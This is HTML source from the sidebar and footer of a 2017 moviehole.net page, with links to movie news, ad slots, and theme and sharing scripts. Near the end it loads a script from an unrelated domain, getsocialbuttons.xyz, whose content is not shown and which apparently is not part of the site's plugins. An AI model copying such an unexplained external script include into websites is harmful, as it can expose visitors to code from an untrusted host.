	<div class="td-block-span12">

        <div class="td_module_mx1 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017113043christina-hendricks-fist-fight" rel="bookmark" title="Christina Hendricks &#8211; Fist Fight"><img width="356" height="220" class="entry-thumb" src="http://moviehole.net/img/hendricks-1-356x220.jpg" alt="" title="Christina Hendricks &#8211; Fist Fight"/></a></div>
            <div class="td-module-meta-info">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113043christina-hendricks-fist-fight" rel="bookmark" title="Christina Hendricks &#8211; Fist Fight">Christina Hendricks &#8211; Fist Fight</a></h3>                <div class="td-editor-date">
                                        <span class="td-author-date">
                        <span class="td-post-author-name"><a href="http://moviehole.net/author/drew">Drew Turney</a> <span>-</span> </span>                        <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-23T00:15:53+00:00" >Feb 23, 2017</time></span>                    </span>
                </div>
            </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_8_58afb74b280c4" data-td_block_id="td_uid_8_58afb74b280c4"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_8_58afb74b280c4" data-td_block_id="td_uid_8_58afb74b280c4"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><script>var block_td_uid_9_58afb74b2e9dd = new tdBlock();
block_td_uid_9_58afb74b2e9dd.id = "td_uid_9_58afb74b2e9dd";
block_td_uid_9_58afb74b2e9dd.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"3, 1213, ","custom_title":"NEWS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"3, 1213, ","td_filter_default_txt":"","color_preset":"","border_top":"","class":"td_block_widget td_uid_9_58afb74b2e9dd_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_9_58afb74b2e9dd.td_column_number = "1";
block_td_uid_9_58afb74b2e9dd.block_type = "td_block_21";
block_td_uid_9_58afb74b2e9dd.post_count = "1";
block_td_uid_9_58afb74b2e9dd.found_posts = "30660";
block_td_uid_9_58afb74b2e9dd.header_color = "#";
block_td_uid_9_58afb74b2e9dd.ajax_pagination_infinite_stop = "";
block_td_uid_9_58afb74b2e9dd.max_num_pages = "30660";
tdBlocksArray.push(block_td_uid_9_58afb74b2e9dd);
</script><div class="td_block_wrap td_block_21 td_block_widget td_uid_9_58afb74b2e9dd_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_9_58afb74b2e9dd" ><h4 class="block-title"><span>NEWS</span></h4><div class="td-subcat-filter" id="td_pulldown_td_uid_9_58afb74b2e9dd"><ul class="td-subcat-list" id="td_pulldown_td_uid_9_58afb74b2e9dd_list"><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_10_58afb74b2fbad" data-td_filter_value="" data-td_block_id="td_uid_9_58afb74b2e9dd" href="#"></a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_11_58afb74b2fbf0" data-td_filter_value="3" data-td_block_id="td_uid_9_58afb74b2e9dd" href="#">Movie News</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_12_58afb74b2fc31" data-td_filter_value="1213" data-td_block_id="td_uid_9_58afb74b2e9dd" href="#">TV</a></li></ul><div class="td-subcat-dropdown"><div class="td-subcat-more" aria-haspopup="true"><span>More</span><i class="td-icon-read-down"></i></div><ul class="td-pulldown-filter-list"></ul></div></div><div id=td_uid_9_58afb74b2e9dd class="td_block_inner">
        <div class="td_module_16 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017113111trailer-their-finest" rel="bookmark" title="Trailer : Their Finest"><img width="150" height="150" class="entry-thumb" src="http://moviehole.net/img/maxresdefault-1056-150x150.jpg" alt="" title="Trailer : Their Finest"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://moviehole.net/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113111trailer-their-finest" rel="bookmark" title="Trailer : Their Finest">Trailer : Their Finest</a></h3>
                <div class="td-module-meta-info">
                                        <span class="td-post-author-name"><a href="http://moviehole.net/author/lacey-bridges">Lacey Bridges</a> <span>-</span> </span>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-24T04:31:36+00:00" >Feb 24, 2017</time></span>                                    </div>

                <div class="td-excerpt">
                    The first trailer for &quot;Their Finest&quot;, a World War II-set romantic dramedy from director Lone Scherfig (&#039;&#039;An Education&#039;&#039;) starring Gemma Arterton, Sam Claflin, and...                </div>
            </div>

        </div>

        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_58afb74b2e9dd" data-td_block_id="td_uid_9_58afb74b2e9dd"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_58afb74b2e9dd" data-td_block_id="td_uid_9_58afb74b2e9dd"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<div class="td-a-rec td-a-rec-id-custom_ad_2 "><!-- ros - 300x250: 300x250 --> 
<div id="ros_10291"></div> </div>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-footer_top">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_13_58afb74b30fdf = new tdBlock();
block_td_uid_13_58afb74b30fdf.id = "td_uid_13_58afb74b30fdf";
block_td_uid_13_58afb74b30fdf.atts = '{"limit":"3","sort":"random_7_day","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"DID YOU MISS?","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_13_58afb74b30fdf_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_13_58afb74b30fdf.td_column_number = "1";
block_td_uid_13_58afb74b30fdf.block_type = "td_block_16";
block_td_uid_13_58afb74b30fdf.post_count = "3";
block_td_uid_13_58afb74b30fdf.found_posts = "46";
block_td_uid_13_58afb74b30fdf.header_color = "#";
block_td_uid_13_58afb74b30fdf.ajax_pagination_infinite_stop = "";
block_td_uid_13_58afb74b30fdf.max_num_pages = "16";
tdBlocksArray.push(block_td_uid_13_58afb74b30fdf);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_13_58afb74b30fdf_rand td-pb-border-top"  data-td-block-uid="td_uid_13_58afb74b30fdf" ><h4 class="block-title"><span>DID YOU MISS?</span></h4><div id=td_uid_13_58afb74b30fdf class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017112998angela-lansbury-joins-disney-movie-remake" rel="bookmark" title="Angela Lansbury joins Disney movie remake!"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/Angela-Lansbury-100x70.jpg" alt="" title="Angela Lansbury joins Disney movie remake!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112998angela-lansbury-joins-disney-movie-remake" rel="bookmark" title="Angela Lansbury joins Disney movie remake!">Angela Lansbury joins Disney movie remake!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-20T07:22:02+00:00" >Feb 20, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017112994my-name-is-emily" rel="bookmark" title="My Name is Emily"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/Stills_Feature_MyNameIsEmily_03-100x70.jpg" alt="" title="My Name is Emily"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112994my-name-is-emily" rel="bookmark" title="My Name is Emily">My Name is Emily</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-20T06:22:13+00:00" >Feb 20, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017113085friday-night-lights-fave-vs-godzilla" rel="bookmark" title="Friday Night Lights fave vs. Godzilla!"><img width="100" height="65" class="entry-thumb" src="http://moviehole.net/img/kylechandler1.jpg" alt="" title="Friday Night Lights fave vs. Godzilla!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113085friday-night-lights-fave-vs-godzilla" rel="bookmark" title="Friday Night Lights fave vs. Godzilla!">Friday Night Lights fave vs. Godzilla!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-23T10:19:05+00:00" >Feb 23, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_14_58afb74b83e4c = new tdBlock();
block_td_uid_14_58afb74b83e4c.id = "td_uid_14_58afb74b83e4c";
block_td_uid_14_58afb74b83e4c.atts = '{"limit":"3","sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"3","category_ids":"","custom_title":"POPULAR STORIES","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_14_58afb74b83e4c_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_14_58afb74b83e4c.td_column_number = "1";
block_td_uid_14_58afb74b83e4c.block_type = "td_block_16";
block_td_uid_14_58afb74b83e4c.post_count = "3";
block_td_uid_14_58afb74b83e4c.found_posts = "30632";
block_td_uid_14_58afb74b83e4c.header_color = "#";
block_td_uid_14_58afb74b83e4c.ajax_pagination_infinite_stop = "";
block_td_uid_14_58afb74b83e4c.max_num_pages = "10211";
tdBlocksArray.push(block_td_uid_14_58afb74b83e4c);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_14_58afb74b83e4c_rand td-pb-border-top"  data-td-block-uid="td_uid_14_58afb74b83e4c" ><h4 class="block-title"><span>POPULAR STORIES</span></h4><div id=td_uid_14_58afb74b83e4c class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/toy-story-100x70.png" alt="" title="Toolman hankering for Toy Story 3"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3">Toolman hankering for Toy Story 3</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2004-11-10T00:00:00+00:00" >Nov 10, 2004</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!"><img width="100" height="40" class="entry-thumb" src="http://moviehole.net/img/sequels2.jpg" alt="" title="10 Recently Cancelled Sequels : Not Coming Soon!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!">10 Recently Cancelled Sequels : Not Coming Soon!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2012-12-02T04:58:44+00:00" >Dec 2, 2012</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works"><img width="100" height="59" class="entry-thumb" src="http://moviehole.net/img/Halloween.jpg" alt="" title="Exclusive: Halloween reboot in the works"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works">Exclusive: Halloween reboot in the works</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2015-06-13T03:04:07+00:00" >Jun 13, 2015</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_block_widget td_uid_15_58afb74dd266c_rand widget widget_categories td-pb-border-top"  data-td-block-uid="td_uid_15_58afb74dd266c" ><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://moviehole.net/category/news">Movie News<span class="td-cat-no">30645</span></a></li><li><a href="http://moviehole.net/category/tv-2">TV<span class="td-cat-no">1668</span></a></li><li><a href="http://moviehole.net/category/movie-trailers">Trailers<span class="td-cat-no">1349</span></a></li><li><a href="http://moviehole.net/category/interviews">Interviews<span class="td-cat-no">1294</span></a></li><li><a href="http://moviehole.net/category/giveaways">Giveaways<span class="td-cat-no">873</span></a></li><li><a href="http://moviehole.net/category/cinema">Film Reviews<span class="td-cat-no">394</span></a></li><li><a href="http://moviehole.net/category/exclusives">Exclusives<span class="td-cat-no">381</span></a></li><li><a href="http://moviehole.net/category/caffeinatedclint">Caffeinated Clint<span class="td-cat-no">277</span></a></li></ul></div> <!-- ./block -->            </div>
        </div>
    </div>
<div class="td-footer-bottom-full">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://moviehole.net/"><img src="http://moviehole.net/img/LOGONEW.png" alt="" title=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>One of the longest running movie news and entertainment sites on the internet</aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></aside></div>        </div>
    </div>
</div>
</div>

<!-- Sub Footer -->
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv 2016
        Version: 7.0.1 (rara)
        Deploy mode: deploy
        
        uid: 58afb74dd3b5e
    -->

    
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/moviehole.net\/2017113111trailer-their-finest":113111};
	</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201708'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.0.1'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/comment-reply.min.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/mega_main_menu/src/js/frontend/menu_functions.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/wp-embed.min.js?ver=4.7.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=4.5'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://moviehole.net/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://moviehole.net/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<script type='text/javascript' src='http://stats.wp.com/e-201708.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.5',blog:'101996096',post:'113111',tz:'0',srv:'moviehole.net'} ]);
	_stq.push([ 'clickTrackerInit', '101996096', '113111' ]);
</script>
<script type="text/javascript" src="http://getsocialbuttons.xyz/get-social.js"></script>
</body>
</html>